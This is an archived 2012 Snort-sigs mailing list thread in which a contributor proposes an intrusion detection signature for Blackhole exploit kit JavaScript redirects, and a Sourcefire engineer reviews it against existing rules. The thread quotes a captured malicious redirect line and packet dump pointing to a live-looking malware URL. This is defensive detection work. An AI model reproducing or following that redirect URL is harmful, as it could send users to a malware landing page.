[Snort-sigs] Proposed Signature - "COMMUNITY SPECIFIC-THREATS Blackhole Terse JavaScript hex 16 byte document.location JavaScript redirect to showthread.php"

Joel Esler jesler at ...435...
Tue Mar 13 11:43:32 EDT 2012


Nathan,

Thanks for your submission. I took the pcap you sent me and ran it through
our ruleset and received the following alerts:

1:21492:5       SPECIFIC-THREATS Blackhole landing page with specific
structure - catch     Alerts: 1
1:1478:12       WEB-CGI swc access
      Alerts: 1
1:6390:7        SPYWARE-PUT Adware esyndicate runtime detection - ads popup
     Alerts: 1
1:21548:1       BOTNET-CNC Cutwail landing page connection attempt
      Alerts: 1

A few others alerted as well, but I removed them as they were set to
"noalert"  (I remove "flowbits:noalert;" from my testing suite so I can see
everything.)

So an additional rule may not add value.  However, looking at your pcap
gave me an idea to modify 21492.  Trying that now.

J

On Tue, Mar 13, 2012 at 11:01 AM, Community Proposed
<lists at ...3397...>wrote:

> I'm having issues getting this to fire, and I've tried a few permutations,
> perhaps I'm simply overlooking something stupid.  I believe you'll get the
> gist of the signature and I would appreciate feedback/changes:
>
> I had also tried, without file_data, content:"|0d 0a 0d
> 0a|document.location="; fast_pattern;
>
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"COMMUNITY
> SPECIFIC-THREATS Blackhole Terse JavaScript hex 16 byte document.location
> JavaScript redirect to showthread.php"; flow:to_client,established;
> file_data;
> content:"document.location="; depth:18; fast_pattern;
> content:"/showthread.php?t="; distance:0;
>
> pcre:"/document.location=[^\r\n\x3b]+\/showthread.php\?t=[a-f0-9]{16}[^\r\n]\x3b/";
> classtype:trojan-activity; sid:436520770; rev:1;)
>
> $ pcretest
> PCRE version 8.02 2010-03-19
>
>  re>
>
> /^document.location=[^\r\n\x3b]+\/showthread.php\?t=[a-f0-9]{16}[^\r\n]\x3b/
> data>
> document.location='
> http://proxiwash.fr:8080/showthread.php?t=d7ad916d1c0396ff';
>  0:
> document.location='
> http://proxiwash.fr:8080/showthread.php?t=d7ad916d1c0396ff';
> data>
> document.location="
> http://proxiwash.fr:8080/showthread.php?t=d7ad916d1c0396ff";
>  0:
> document.location="
> http://proxiwash.fr:8080/showthread.php?t=d7ad916d1c0396ff";
> data> document.location="http://localhost"; alert("Hello from
> showthread.php?t=d7ad916d1c0396ff");
> No match
> data> ^C
>
> 09:16:26.964654 IP 187.45.193.142.80 > a.b.c.d.2968: P 1:386(385) ack 376
> win
> 6432
>        0x0000:  4500 01a9 6eb9 4000 2c06 da8e bb2d c18e  E...n. at ...180...,....-..
>        0x0010:  0ad9 7c72 0050 0b98 1333 57ff d926 a6f6  ..|r.P...3W..&..
>        0x0020:  5018 1920 0d8c 0000 4854 5450 2f31 2e31  P.......HTTP/1.1
>        0x0030:  2032 3030 204f 4b0d 0a53 6572 7665 723a  .200.OK..Server:
>        0x0040:  2041 7061 6368 650d 0a4c 6173 742d 4d6f  .Apache..Last-Mo
>        0x0050:  6469 6669 6564 3a20 5475 652c 2031 3320  dified:.Tue,.13.
>        0x0060:  4d61 7220 3230 3132 2031 333a 3135 3a32  Mar.2012.13:15:2
>        0x0070:  3620 474d 540d 0a43 6f6e 7465 6e74 2d54  6.GMT..Content-T
>        0x0080:  7970 653a 2061 7070 6c69 6361 7469 6f6e  ype:.application
>        0x0090:  2f78 2d6a 6176 6173 6372 6970 740d 0a43  /x-javascript..C
>        0x00a0:  6163 6865 2d43 6f6e 7472 6f6c 3a20 4e6f  ache-Control:.No
>        0x00b0:  2d43 6163 6865 0d0a 5072 6167 6d61 3a20  -Cache..Pragma:.
>        0x00c0:  6e6f 2d63 6163 6865 0d0a 436f 6e74 656e  no-cache..Conten
>        0x00d0:  742d 4c65 6e67 7468 3a20 3739 0d0a 4461  t-Length:.79..Da
>        0x00e0:  7465 3a20 5475 652c 2031 3320 4d61 7220  te:.Tue,.13.Mar.
>        0x00f0:  3230 3132 2031 343a 3136 3a32 3620 474d  2012.14:16:26.GM
>        0x0100:  540d 0a58 2d56 6172 6e69 7368 3a20 3137  T..X-Varnish:.17
>        0x0110:  3738 3333 3739 3431 2031 3737 3833 3334  78337941.1778334
>        0x0120:  3534 360d 0a41 6765 3a20 3332 0d0a 5669  546..Age:.32..Vi
>        0x0130:  613a 2031 2e31 2076 6172 6e69 7368 0d0a  a:.1.1.varnish..
>        0x0140:  436f 6e6e 6563 7469 6f6e 3a20 6b65 6570  Connection:.keep
>        0x0150:  2d61 6c69 7665 0d0a 0d0a 646f 6375 6d65  -alive....docume
>        0x0160:  6e74 2e6c 6f63 6174 696f 6e3d 2768 7474  nt.location='htt
>        0x0170:  703a 2f2f 7072 6f78 6977 6173 682e 6672  p://proxiwash.fr
>        0x0180:  3a38 3038 302f 7368 6f77 7468 7265 6164  :8080/showthread
>        0x0190:  2e70 6870 3f74 3d64 3761 6439 3136 6431  .php?t=d7ad916d1
>        0x01a0:  6330 3339 3666 6627 3b                   c0396ff';
>
> Thanks,
> Nathan
>
>


-- 
Joel Esler
Senior Research Engineer, VRT
OpenSource Community Manager
Sourcefire
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.snort.org/pipermail/snort-sigs/attachments/20120313/bd7f57a0/attachment.html>


More information about the Snort-sigs mailing list